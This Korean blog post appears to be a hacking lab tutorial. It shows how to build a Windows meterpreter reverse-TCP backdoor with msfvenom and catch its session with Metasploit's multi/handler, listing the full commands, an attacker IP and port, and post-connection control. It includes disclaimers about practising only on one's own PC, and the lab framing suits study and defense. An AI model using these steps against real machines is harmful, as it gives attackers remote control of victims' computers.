Notice
Recent Posts
Recent Comments
Link
«   2025/02   »
1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28
Tags more
Archives
Today
Total
관리 메뉴

BEATSLOTH 공대인의 무덤

[backdoor] 오늘은 백도어 실습입니다 ~ (msfvenom 이용한 backdoor) 본문

HACKING

[backdoor] 오늘은 백도어 실습입니다 ~ (msfvenom 이용한 backdoor)

SLOTHH 2016. 12. 24. 19:03

오늘은 백도어 실습해볼겁니다. 우선적으로 말해둘건 .. 전 제컴에다가 사용했으니 문제는 없을 터 인데 .. 


어디 바깥에서 무단으로 사용했다간 쇠고랑 차기 쉽다는 거죠 . 


자기 pc에나 백도어 실험 합시다.  저는 교육 목적일 뿐 .. 

무단으로 사용하다가 잡혀갈 시 제 책임이 없음을 미리 알려드립니다. 


양날의 검과 같아서 알아서 잘 사용하실거라 믿습니다. 


은팔찌 차고 쟤가 블로그에 저거 올려서 가르쳐 줬어요 ! 하면서 잡혀갈 일 없었으면 합니다. 


저는 분명히 말 했습니당 ... 



https://oneclick.law.go.kr/CSP/CnpClsMain.laf?popMenu=ov&csmSeq=692&ccfNo=3&cciNo=1&cnpClsNo=2



실습 전에 한번씩들 읽어보고 범죄에 대한 생각이 없으셨으면 합니다. 

----------------------------------------------------------------------------------------------------------------



예이예에에 오늘은 백도어 실습을 해봅시다 .


백도어란 무엇인가 ? 


뒷문입니다. 


뒷문이 뭐냐구요 ?? 


백도어는 개발자 및 프로그래머가 관리상의 목적으로 뚫어놓은 것이라고 보면 되는데요 

이것을 이용해 범죄에 악용되고 있습죠 .


백도어를 설치하면 자기 pc처럼 사용할 수 있습니다. 

어떻게요 ?? 


자 이제부터 알아보도록 하죠 


오늘도 준비물은 VMware ,칼리 리눅스와 윈도우 7 입니다. 


우리 칼리예를 켜주시죠 



터미널을 열어주시구요 ! 


저희는 msfvenom을 사용할 것입니다.


msfvenommetasploit 에서 버전이 바뀌면서 이름이 바뀐 페이로드 라고 하네요 . 

(라고 의역 했습니다)


주어진 옵션을 쭉 볼 수 있습니다.


무엇을 할수 있는지 리스트를 볼까요 ?   




msfvenom -l 를 치면 사용할 수 있는 기법들이 쭈욱 나옵니다. 상당히 많아요 


플랫폼 별로도 있고! 저흰 윈도우를 할꺼니까 윈도우로 들어가 줍시다.




자아 이제 커맨드를 입력해 봅시다. 

명령어 순서는 msfvenom -p 페이로드 LHOST=아이피 LPORT=포트 -f exe>이름.exe입니다.



저는 msfvenom -p winodws/meterpreter/reverse_tcp LHOST=192.168.116.136 LPORT=8080 -f exe >lll.exe

를 쳐주었습니다. 




자동으로 백도어 툴이 생성되어 root 폴더에 안착 된것을 볼 수 있습니다. 


저기 보이는 lll.exe를 공격대상 PC에 옮겨주세요 ! 아직 실행 안시키셔도 됩니다. 




그리고 핸들러를 이용하기위해 msfconsole을 들어가 줍니다. 



핸들러를 이용하기 위해선 

use exploit/multi/handler를 쳐주고 



페이로드를 연결해줘야합니다. 아까 파일 만들때 썼던 페이로드를 적어주시면 됩니다.


Set payload windows/meterpreter/reverse_tcp를 쳐주면 

아래 payload => windows/meterpreter/reverse_tcp가 나오는군요



그리고 아까 파일 만들때 적은 아이피와 포트를 적어줘야하죠 


set LHOST 192.168.116.136

하면 LHOST =>192.168.116.136

set LPORT 8080

하면 LPORT => 8080이라고 나오는군요 


그리고 set ExitONsession false를 해줍시다 .



그리고 exploit -j -z를 눌러 시작시켜줍니다.



이제 공격 대상 컴퓨터에서 백도어를 실행시키면 다음과 같이 세션이 넘어옵니다.


위에 세션이 1이었으니 

sessions -i 1로 들어가 줍시다.


그리고 sysinfo를 해주면 백도어가 설치된 컴퓨터 정보가 나오게 됩니다. 


여기서 부터는 모든 cmd 명령어를 칠 수 있으며 파일 삭제 및 설치 ,실행이 가능합니다. 


오늘도 실습 성공 입니다 ! 




--------------------------------------------------------------------------------------------------------------------------------------------------

꼭 자신의 PC에서 실습하시길 바랍니다.

허가받지 않은 곳에서 사용시 발생하는 

모든 사고는 저의 책임이 아닌  여러분 자신의 책임입니다. 


저작자표시 비영리 변경금지

'HACKING' 카테고리의 다른 글

[코드게이트 2017] 죽 ...여 ...줘 ...  (2) 2017.02.10
[코드게이트 2017] 코드게이트 예선이 내일부터 시작입니다.  (0) 2017.02.09
해킹 카테고리 이용안내  (0) 2016.02.13
공유하기 링크
'HACKING' Related Articles more
Comments